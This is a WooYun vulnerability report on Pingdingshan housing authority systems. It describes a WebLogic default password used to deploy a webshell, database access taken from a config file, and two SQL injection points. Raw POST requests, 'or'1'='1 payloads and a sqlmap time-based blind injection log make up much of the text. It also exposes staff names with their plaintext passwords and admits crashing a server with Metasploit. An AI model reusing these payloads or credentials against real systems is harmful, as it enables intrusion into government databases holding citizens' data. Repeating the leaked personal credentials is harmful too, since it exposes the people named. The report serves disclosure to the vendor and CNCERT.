当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145954

漏洞标题:平顶山市房管局多个系统弱口令+SQL注入威胁公民信息安全(已shell\数据库数百张表)

相关厂商:平顶山市房管局

漏洞作者: 默之

提交时间:2015-10-11 14:02

修复时间:2015-11-30 08:56

公开时间:2015-11-30 08:56

漏洞类型:应用配置错误

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-11: 细节已通知厂商并且等待厂商处理中
2015-10-16: 厂商已经确认,细节仅向厂商公开
2015-10-26: 细节向核心白帽子及相关领域专家公开
2015-11-05: 细节向普通白帽子公开
2015-11-15: 细节向实习白帽子公开
2015-11-30: 细节向公众公开

简要描述:

弱口令造成的错,怪我咯?

详细说明:

# 1 平顶山市房屋安全普查系统弱口令
http://**.**.**.**/console/login/LoginForm.jsp
weblogic弱口令
weblogic/weblogic123(应该是这样的,后面我会解释下的)
之后部署war包,得到shell
http://**.**.**.**/test/da.jsp
查看了一下本地数据库备份文件,挺大的,应该不止这一处,没有深挖

数据.png


之后找到了数据库配置文件

<property name="url" value="jdbc:oracle:thin:@localhost:1521/orcl"></property>
		<property name="username" value="****"></property>
		<property name="password" value="****"></property>


连上之后发现这事一个很大的数据库,加载完毕网页几乎就不动弹了,粗略估计有数百张表,含有大量user内容的表单

数百个表.png


之后找到了大量log文件,看了看里面竟然记录了管理员等的明文密码和账号

log1.png


log+密码.png


尝试登陆,发现admin密码已经改变,好吧,那就找一下最近日子的登陆日志,得到了数个账号

userName=[邬源渊] password=[000000]
userName=[张广和] password=[000000]
userName=[胡筱华] password=[000000]
userName=[田爱青] password=[000000] 
userName=[杜凯歌] password=[000000]
userName=[李赛] password=[000000]
userName=[马逢源] password=[000000]


登陆一下,发现可以的

登陆.png


重点说一下,非常抱歉把你们的服务器宕机了,我是无意的,非常抱歉!
情况是这样的,我使用metasploit准备生成meterpreter时,不知道机器怎么回事对这种可执行文件过敏还是什么的,一下子就宕机了。

漏洞证明:

# 2 另一系统两处SQL注入
1.http://**.**.**.**:8080/PUBLIC/YSB/XGMM.aspx

截图20151011103100.png


截图20151011103109.png


当把账户改为'or'1'='1时,弹出不一样的框,确认存在注入

截图20151011103127.png


POST /PUBLIC/YSB/XGMM.aspx HTTP/1.1
Host: **.**.**.**:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**:8080/PUBLIC/YSB/XGMM.aspx
Cookie: checkcode=YmWtacHLtTY=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 282
__VIEWSTATE=%2FwEPDwUKLTM2MTk4Mzg4MGRkXd7zUQmHCPu6l6JusZVXeF5msXskuWU21YwE84VDTdU%3D&__VIEWSTATEGENERATOR=B30D5827&txtXM=&txtSFZH=%27or%271%27%3D%271*&txtCheckCode=5053&btnOK=%E7%A1%AE%E5%AE%9A&hfSQBH=&hfInfoCode=&hfFamilyCode=&hfDJS=&hfSQ=&hfJD=&hdDir1=..%2F..%2F


txtSFZH参数存在注入oracle盲注

house1注入.png


[09:29:03] [INFO] parsing HTTP request from 'pingdingshan.txt'
custom injection marking character ('*') found in option '--data'. Do you want t
o process it? [Y/n/q] y
[09:29:04] [INFO] resuming back-end DBMS 'oracle'
[09:29:04] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: (custom) POST
Parameter: #2*
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: __VIEWSTATE=/wEPDwUKLTM2MTk4Mzg4MGRkXd7zUQmHCPu6l6JusZVXeF5msXskuWU
21YwE84VDTdU%3D&__VIEWSTATEGENERATOR=B30D5827&txtXM='or'1'%3D'1&txtSFZH='or'1'%3
D'1' AND 7125=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(118)||CHR(86)||CHR(113),5)
AND 'eXIv'='eXIv&txtCheckCode=5053&btnOK=%E7%A1%AE%E5%AE%9A&hfSQBH=&hfInfoCode=&
hfFamilyCode=&hfDJS=&hfSQ=&hfJD=&hdDir1=../../
---
[09:29:04] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle
[09:29:04] [INFO] fetching tables for database: 'HISZFBZ'
[09:29:04] [INFO] fetching number of tables for database 'HISZFBZ'
[09:29:04] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[09:29:09] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
1
[09:29:22] [INFO] adjusting time delay to 1 second due to good response times
[09:29:24] [ERROR] invalid character detected. retrying..
[09:29:24] [WARNING] increasing time delay to 2 seconds
56
[09:29:39] [INFO] retrieved: BD
[09:30:02] [ERROR] invalid character detected. retrying..
[09:30:02] [WARNING] increasing time delay to 3 seconds
DZ_F
[09:31:09] [ERROR] invalid character detected. retrying..
[09:31:09] [WARNING] increasing time delay to 4 seconds
UNCT
[09:32:28] [ERROR] invalid character detected. retrying..
[09:32:28] [WARNING] increasing time delay to 5 seconds
[09:32:41] [ERROR] invalid character detected. retrying..
[09:32:41] [WARNING] increasing time delay to 6 seconds
IONS
[09:34:32] [CRITICAL] unable to connect to the target url or proxy. sqlmap is go
ing to retry the request
 !
[09:34:42] [INFO] retrieved:
[09:34:58] [ERROR] unable to properly validate last character value ('I')..
IEMS_COMPAN
[09:36:04] [ERROR] invalid character detected. retrying..
[09:36:04] [WARNING] increasing time delay to 2 seconds
Y
[09:36:15] [INFO] retrieved: HEMS_CO
[09:37:28] [ERROR] invalid character detected. retrying..
[09:37:28] [WARNING] increasing time delay to 3 seconds
MPAN
[09:38:33] [ERROR] invalid character detected. retrying..
[09:38:33] [WARNING] increasing time delay to 4 seconds
Y
[09:39:14] [ERROR] invalid character detected. retrying..
[09:39:14] [WARNING] increasing time delay to 5 seconds
[09:39:46] [ERROR] invalid character detected. retrying..
[09:39:46] [WARNING] increasing time delay to 6 seconds
_CL
[09:41:15] [ERROR] unable to properly validate last character value ('C')..
C
[09:41:21] [ERROR] invalid character detected. retrying..
[09:41:21] [WARNING] increasing time delay to 2 seconds
SS
[09:41:41] [INFO] retrieved: BDDZ_CONTROL
[09:43:44] [INFO] retrieved: BDDZ_FORM+
[09:44:40] [INFO] retrieved: HE
[09:45:05] [ERROR] invalid character detected. retrying..
[09:45:05] [WARNING] increasing time delay to 3 seconds
MS_COM
[09:46:39] [ERROR] invalid character detected. retrying..
[09:46:39] [WARNING] increasing time delay to 4 seconds
[09:47:01] [ERROR] invalid character detected. retrying..
[09:47:01] [WARNING] increasing time delay to 5 seconds
PANY_YW A
[09:49:35] [INFO] retrieved: HEMS_PE
[09:51:00] [ERROR] invalid character detected. retrying..
[09:51:00] [WARNING] increasing time delay to 6 seconds
RSON
[09:52:46] [INFO] retrieved: HEMS_PERSON_Y
[09:55:20] [ERROR] unable to properly validate last character value ('X')..
X
[09:55:23] [INFO] retrieved: HIMS_B
[09:55:59] [ERROR] invalid character detected. retrying..
[09:55:59] [WARNING] increasing time delay to 2 seconds
TFFMX
[09:56:52] [INFO] retrieved: HIMS_BTFFMK_
[09:57:43] [ERROR] invalid character detected. retrying..
[09:57:43] [WARNING] increasing time delay to 3 seconds
YW
[09:58:13] [ERROR] invalid character detected. retrying..
[09:58:13] [WARNING] increasing time delay to 4 seconds
[09:58:16] [INFO] retrieved: HIMS_BTS
[09:59:16] [ERROR] invalid character detected. retrying..
[09:59:16] [WARNING] increasing time delay to 5 seconds
Q_YW A
[10:00:48] [INFO] retrieved: HIMS_BU
[10:01:50] [ERROR] invalid character detected. retrying..
[10:01:50] [WARNING] increasing time delay to 6 seconds
[10:02:05] [ERROR] unable to properly validate last character value ('a')..
aLD
[10:02:21] [INFO] retrieved: HIMS_C
[10:02:39] [ERROR] invalid character detected. retrying..
[10:02:39] [WARNING] increasing time delay to 2 seconds
OM
[10:03:06] [ERROR] invalid character detected. retrying..
[10:03:06] [WARNING] increasing time delay to 3 seconds
P
[10:03:32] [ERROR] invalid character detected. retrying..
[10:03:32] [WARNING] increasing time delay to 4 seconds
[10:03:47] [ERROR] invalid character detected. retrying..
[10:03:47] [WARNING] increasing time delay to 5 seconds
[10:04:00] [ERROR] invalid character detected. retrying..
[10:04:00] [WARNING] increasing time delay to 6 seconds
[10:04:21] [ERROR] unable to properly validate last character value ('M')..
MAINTS
[10:04:53] [INFO] retrieved: HIMS_FA
[10:05:16] [ERROR] invalid character detected. retrying..
[10:05:16] [WARNING] increasing time delay to 2 seconds
[10:05:23] [ERROR] invalid character detected. retrying..
[10:05:23] [WARNING] increasing time delay to 3 seconds
MILY
[10:06:13] [INFO] retrieved: HIMS_FAMILYFILES
[10:07:48] [INFO] retrieved: HIMS_FAMILYFY
[10:08:39] [INFO] retrieved:


2.http://**.**.**.**/public/demo/SQMore.aspx?work=0&type=0
提交数据'or'1'='1返回数据不一致

没有.png


or1=1.png


POST /public/demo/SQMore.aspx?work=0&type=0 HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/public/demo/SQMore.aspx?work=0&type=0
Cookie: checkcode=apk7jzVhJXA=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 7336
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTEwMDgxNDc0MDIPZBYCAgMPZBYGAgMPFgIeCWlubmVyaHRtbAU1PGEgaHJlZj0nZGVtby5hc3B4Jz7pppbpobU8L2E%2BPj7lu4nnp5%2FmiL%2FnlLPor7fmn6Xor6JkAhcPFgIfAAWrJTx1bD48dGFibGUgYm9yZGVyPScwJyBjZWxsc3BhY2luZz0nMCcgY2VsbHBhZGRpbmc9JzAnIHdpZHRoPScxMDAlJz48dGFibGUgYWxpZ249J2NlbnRlcicgYm9yZGVyPScwJyBjZWxsc3BhY2luZz0nMCcgY2VsbHBhZGRpbmc9JzAnIHdpZHRoPSc2MCUnPjx0cj48dGQgYWxpZ249J2xlZnQnPjxsaT48YSBocmVmPSdEZXRhaWxzLmFzcHg%2Fd29yaz0wJnR5cGU9MCZuYW1lPeeUn%2BengOmYgSZpZD0wMUE0OTVBNUVEMUE0MzIwQTEyNTUyMkYxNDlBN0QxMic%2B55Sf56eA6ZiBXzQxMDQqKioqKioqKioqKioqKl%2FmlrDljY7ljLpf5pegPC9hPjxzcGFuIHN0eWxlPSdjb2xvcjpncmF5Jz4oMjAxNS0wOC0yNSk8L3NwYW4%2BPC9saT48L3RkPjwvdHI%2BPHRyPjx0ZCBhbGlnbj0nbGVmdCc%2BPGxpPjxhIGhyZWY9J0RldGFpbHMuYXNweD93b3JrPTAmdHlwZT0wJm5hbWU95ber6LS15Y2OJmlkPTM4ODhDMTRDRUY2MjQ3NTk4MzI2MDlDRkNDQzY4MUY5Jz7lt6votLXljY5fNDEwNCoqKioqKioqKioqKioqX%2BWNq%2BS4nOWMul%2Fml6A8L2E%2BPHNwYW4gc3R5bGU9J2NvbG9yOmdyYXknPigyMDE1LTA4LTIxKTwvc3Bhbj48L2xpPjwvdGQ%2BPC90cj48dHI%2BPHRkIGFsaWduPSdsZWZ0Jz48bGk%2BPGEgaHJlZj0nRGV0YWlscy5hc3B4P3dvcms9MCZ0eXBlPTAmbmFtZT3lsrPmmKXkuL0maWQ9REFFQzQyOEJFQTYwNDM0QkEzRTVEMDNFNjIzQzNERTcnPuWys%2BaYpeS4vV80MTA0KioqKioqKioqKioqKipf5paw5Y2O5Yy6X%2BaXoDwvYT48c3BhbiBzdHlsZT0nY29sb3I6Z3JheSc%2BKDIwMTUtMDgtMTgpPC9zcGFuPjwvbGk%2BPC90ZD48L3RyPjx0cj48dGQgYWxpZ249J2xlZnQnPjxsaT48YSBocmVmPSdEZXRhaWxzLmFzcHg%2Fd29yaz0wJnR5cGU9MCZuYW1lPeiMg%2Bi%2FnuWGmyZpZD04RjQ3OTQwRjZBNDM0OEY4OTdFMkNBQjA4REU0NzVEMic%2B6IyD6L%2Be5YabXzQxMDQqKioqKioqKioqKioqKl%2FmlrDljY7ljLpf5pegPC9hPjxzcGFuIHN0eWxlPSdjb2xvcjpncmF5Jz4oMjAxNS0wOC0xNyk8L3NwYW4%2BPC9saT48L3RkPjwvdHI%2BPHRyPjx0ZCBhbGlnbj0nbGVmdCc%2BPGxpPjxhIGhyZWY9J0RldGFpbHMuYXNweD93b3JrPTAmdHlwZT0wJm5hbWU95a2Z5LuY5LymJmlkPUI4MEM2REM4ODdDMjQyRjg5Qjg5NjdBQTZGQjdFODUwJz7lrZnku5jkvKZfNDEwNCoqKioqKioqKioqKioqX%2Ba5m%2Bays%2BWMul%2FlubPpobblsbHlubPov5Dmsb3ovabov5DovpPmnInpmZDlhazlj7g8L2E%2BPHNwYW4gc3R5bGU9J2NvbG9yOmdyYXknPigyMDE1LTA4LTAzKTwvc3Bhbj48L2xpPjwvdGQ%2BPC90cj48dHI%2BPHRkIGFsaWduPSdsZWZ0Jz48bGk%2BPGEgaHJlZj0nRGV0YWlscy5hc3B4P3dvcms9MCZ0eXBlPTAmbmFtZT3mnY7np4Dmnp0maWQ9MzdGMDY1RjU4NzU1NDgzMkI2NzI2NDk4QUE2NzUxRTgnPuadjuengOaenV80MTA0KioqKioqKioqKioqKipf5rmb5rKz5Yy6X%2BaXoOW3peS9nOWNleS9je%2B8jOacquS6pOekvuS%2FnTwvYT48c3BhbiBzdHlsZT0nY29sb3I6Z3JheSc%2BKDIwMTUtMDctMzApPC9zcGFuPjwvbGk%2BPC90ZD48L3RyPjx0cj48dGQgYWxpZ249J2xlZnQnPjxsaT48YSBocmVmPSdEZXRhaWxzLmFzcHg%2Fd29yaz0wJnR5cGU9MCZuYW1lPem7hOWHryZpZD0yN0VDRTNFNjQxQ0I0RTZBODE1MURCMjlEMzMwOURFMCc%2B6buE5YevXzQxMDQqKioqKioqKioqKioqKl%2FmuZvmsrPljLpf5pegPC9hPjxzcGFuIHN0eWxlPSdjb2xvcjpncmF5Jz4oMjAxNS0wNy0zMCk8L3NwYW4%2BPC9saT48L3RkPjwvdHI%2BPHRyPjx0ZCBhbGlnbj0nbGVmdCc%2BPGxpPjxhIGhyZWY9J0RldGFpbHMuYXNweD93b3JrPTAmdHlwZT0wJm5hbWU95LmU6I%2BK6aaZJmlkPTUyNTE0MENCNkU3NDRBNTJCNzY1N0VEMDU5OEE0MjhBJz7kuZToj4rppplfNDEwNCoqKioqKioqKioqKioqX%2BaWsOWNjuWMul%2Fml6A8L2E%2BPHNwYW4gc3R5bGU9J2NvbG9yOmdyYXknPigyMDE1LTA3LTMwKTwvc3Bhbj48L2xpPjwvdGQ%2BPC90cj48dHI%2BPHRkIGFsaWduPSdsZWZ0Jz48bGk%2BPGEgaHJlZj0nRGV0YWlscy5hc3B4P3dvcms9MCZ0eXBlPTAmbmFtZT3nmb3lqJwmaWQ9QzIyOEM2QzlEMjJFNDQ2MTlBRkY0QjNEOURERDg2NEEnPueZveWonF80MTA0KioqKioqKioqKioqKipf5rmb5rKz5Yy6X%2BaXoDwvYT48c3BhbiBzdHlsZT0nY29sb3I6Z3JheSc%2BKDIwMTUtMDctMjQpPC9zcGFuPjwvbGk%2BPC90ZD48L3RyPjx0cj48dGQgYWxpZ249J2xlZnQnPjxsaT48YSBocmVmPSdEZXRhaWxzLmFzcHg%2Fd29yaz0wJnR5cGU9MCZuYW1lPeW8oOiJs%2BiKsyZpZD1ENEM4NEJCNDU1Qjg0M0ZFOTJGQTVBOTUxMENFQzM5MSc%2B5byg6Imz6IqzXzQxMDQqKioqKioqKioqKioqKl%2FljavkuJzljLpf5bmz6aG25bGx5ZWG5Zy6PC9hPjxzcGFuIHN0eWxlPSdjb2xvcjpncmF5Jz4oMjAxNS0wNy0yMyk8L3NwYW4%2BPC9saT48L3RkPjwvdHI%2BPHRyPjx0ZCBhbGlnbj0nbGVmdCc%2BPGxpPjxhIGhyZWY9J0RldGFpbHMuYXNweD93b3JrPTAmdHlwZT0wJm5hbWU95YiY5bGx5oiQJmlkPTJFOURDODIxOERDNjQyQ0FBNjJFMUI3RDVGQTZEQjAwJz7liJjlsbHmiJBfNDEwNCoqKioqKioqKioqKioqX%2BWNq%2BS4nOWMul%2FluILmoIflh4bku7bljoI8L2E%2BPHNwYW4gc3R5bGU9J2NvbG9yOmdyYXknPigyMDE1LTA3LTIxKTwvc3Bhbj48L2xpPjwvdGQ%2BPC90cj48dHI%2BPHRkIGFsaWduPSdsZWZ0Jz48bGk%2BPGEgaHJlZj0nRGV0YWlscy5hc3B4P3dvcms9MCZ0eXBlPTAmbmFtZT3otbXojonmlY8maWQ9RkNFODJBNTkyMkRFNEQyNjhFNkRFOEJBOTNFQzlFMTInPui1teiOieaVj180MTExKioqKioqKioqKioqKipf5paw5Y2O5Yy6X%2BaXoDwvYT48c3BhbiBzdHlsZT0nY29sb3I6Z3JheSc%2BKDIwMTUtMDctMjApPC9zcGFuPjwvbGk%2BPC90ZD48L3RyPjx0cj48dGQgYWxpZ249J2xlZnQnPjxsaT48YSBocmVmPSdEZXRhaWxzLmFzcHg%2Fd29yaz0wJnR5cGU9MCZuYW1lPeW8oOW5s%2BWuiSZpZD1BRjBEMzI2RjJFMzc0NzU0QjA3NDE0RkRCOEZGMTQ3Nyc%2B5byg5bmz5a6JXzQxMDQqKioqKioqKioqKioqKl%2FljavkuJzljLpf5pegPC9hPjxzcGFuIHN0eWxlPSdjb2xvcjpncmF5Jz4oMjAxNS0wNy0xNyk8L3NwYW4%2BPC9saT48L3RkPjwvdHI%2BPHRyPjx0ZCBhbGlnbj0nbGVmdCc%2BPGxpPjxhIGhyZWY9J0RldGFpbHMuYXNweD93b3JrPTAmdHlwZT0wJm5hbWU96IuP6ICQ6aOOJmlkPUEzQUZFOUU0QzZGQzQ0NTI5NjFDMEIzMUMzNEYzRDU0Jz7oi4%2FogJDpo45fNDEwNCoqKioqKioqKioqKioqX%2Ba5m%2Bays%2BWMul%2FmlrDljY7ljLrlirPkv53lsYDpgIDkvJE8L2E%2BPHNwYW4gc3R5bGU9J2NvbG9yOmdyYXknPigyMDE1LTA3LTEzKTwvc3Bhbj48L2xpPjwvdGQ%2BPC90cj48dHI%2BPHRkIGFsaWduPSdsZWZ0Jz48bGk%2BPGEgaHJlZj0nRGV0YWlscy5hc3B4P3dvcms9MCZ0eXBlPTAmbmFtZT3liJjnjonmooUmaWQ9NzQ0RTIxNzRCQTcwNDRDM0JBQjRCRkQ5Q0VGQkVDNkMnPuWImOeOieaihV80MTA0KioqKioqKioqKioqKipf5paw5Y2O5Yy6XzwvYT48c3BhbiBzdHlsZT0nY29sb3I6Z3JheSc%2BKDIwMTUtMDctMTEpPC9zcGFuPjwvbGk%2BPC90ZD48L3RyPjx0cj48dGQgYWxpZ249J2xlZnQnPjxsaT48YSBocmVmPSdEZXRhaWxzLmFzcHg%2Fd29yaz0wJnR5cGU9MCZuYW1lPeadjuWQjOWWnCZpZD03MTYxREJCMjZFN0Y0MjJDODdGOTY1MkU4RTU1NDEwMSc%2B5p2O5ZCM5ZacXzQxMjMqKioqKioqKioqKioqKl%2FmuZvmsrPljLpf5peg77yI5Liq5Lq65pyq57y057qz5YW76ICB6YeR77yJPC9hPjxzcGFuIHN0eWxlPSdjb2xvcjpncmF5Jz4oMjAxNS0wNy0wNyk8L3NwYW4%2BPC9saT48L3RkPjwvdHI%2BPHRyPjx0ZCBhbGlnbj0nbGVmdCc%2BPGxpPjxhIGhyZWY9J0RldGFpbHMuYXNweD93b3JrPTAmdHlwZT0wJm5hbWU96K645LukJmlkPTRBRDYwNUE1NEQ3MzQ1NTRCMDk0ODJFNkQ5MzAzMTFFJz7orrjku6RfNDExMCoqKioqKioqKioqKioqX%2Ba5m%2Bays%2BWMul%2Fml6Dlt6XkvZzvvIzml6DkuqTnpL7kv508L2E%2BPHNwYW4gc3R5bGU9J2NvbG9yOmdyYXknPigyMDE1LTA3LTA3KTwvc3Bhbj48L2xpPjwvdGQ%2BPC90cj48dHI%2BPHRkIGFsaWduPSdsZWZ0Jz48bGk%2BPGEgaHJlZj0nRGV0YWlscy5hc3B4P3dvcms9MCZ0eXBlPTAmbmFtZT3mpZrnv6Dlh68maWQ9RDdCNzREMTk5NEYzNEVEQTkyMjI5RDVBQUUwNDIyNzknPualmue%2FoOWHr180MTA0KioqKioqKioqKioqKipf5rmb5rKz5Yy6X%2BW5s%2BmhtuWxseiBmuS6rueCueWbvuaWh%2BiuvuiuoeaciemZkOWFrOWPuDwvYT48c3BhbiBzdHlsZT0nY29sb3I6Z3JheSc%2BKDIwMTUtMDctMDcpPC9zcGFuPjwvbGk%2BPC90ZD48L3RyPjx0cj48dGQgYWxpZ249J2xlZnQnPjxsaT48YSBocmVmPSdEZXRhaWxzLmFzcHg%2Fd29yaz0wJnR5cGU9MCZuYW1lPeWImOWJjeeoiyZpZD1CQzUyMTU2RDAwMEQ0RDQ5QjlFQkI0NjA4OTI5MUY0RSc%2B5YiY5YmN56iLXzQxMDQqKioqKioqKioqKioqKl%2FmuZvmsrPljLpf5rG96L2m6L%2BQ6L6T5LqM6Zif5LqM5YiG5YWs5Y%2B477yM5b6F5Lia77yM56S%2B5L%2Bd5Y2V5L2N5LqkPC9hPjxzcGFuIHN0eWxlPSdjb2xvcjpncmF5Jz4oMjAxNS0wNy0wNyk8L3NwYW4%2BPC9saT48L3RkPjwvdHI%2BPHRyPjx0ZCBhbGlnbj0nbGVmdCc%2BPGxpPjxhIGhyZWY9J0RldGFpbHMuYXNweD93b3JrPTAmdHlwZT0wJm5hbWU96ZmI5Li95b2xJmlkPTk2MkFGOUMzRDU5OTRGOENBQTA1MTEzRDAzNTQwOERFJz7pmYjkuL3lvbFfNDEwNCoqKioqKioqKioqKioqX%2BWNq%2BS4nOWMul%2FlubPmo4npm4blm6IgIOWGhemAgOiBjOW3pTwvYT48c3BhbiBzdHlsZT0nY29sb3I6Z3JheSc%2BKDIwMTUtMDctMDYpPC9zcGFuPjwvbGk%2BPC90ZD48L3RyPjwvdGFibGU%2BPC90YWJsZT48L3VsPmQCGQ9kFgoCAQ8PFgIeBFRleHQFBDEzMjlkZAIDDw8WAh8BBQExZGQCBQ8PFgIeB0VuYWJsZWRoZGQCBw8PFgIfAmhkZAIRDw8WAh8BBQI2N2RkZMLonD%2FuJd4ByUsn%2BgOtdumh2ow6uofNDrMHg9iZkyb2&__VIEWSTATEGENERATOR=109A0000&__EVENTVALIDATION=%2FwEWDQLizfLDCAKj%2B%2Br3AwLXp9SJDQKmlKHVCgL6xpitCQKEidv8CQLvjry%2FBQKtkuWiCgKkwZD6AQKgwYz6AgKSvKKuBQL32Zn5DwKEssiCCqahIal94iGAVt9ybQltG9mr7MR0RXj3NGtTxLfjdvcI&txtXM=&txtZJHM=%27or%271%27%3D%271*&txtSQLocation=&txtSQFromTime=&txtSQToTime=&btnQuery=%E6%9F%A5%E8%AF%A2&PNSQMore%24txtNewPageIndex=1&hidWhere=


依然是txtZJHM参数有问题,建议把这个参数好好排查一下

house注入.png

修复方案:

1.更改弱口令
2.查看一下txtZJHM参数,修改一下
3.最后再次表示道歉。

版权声明:转载请注明来源 默之@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-16 08:55

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给河南分中心,由其后续协调网站管理单位处置.

最新状态:

暂无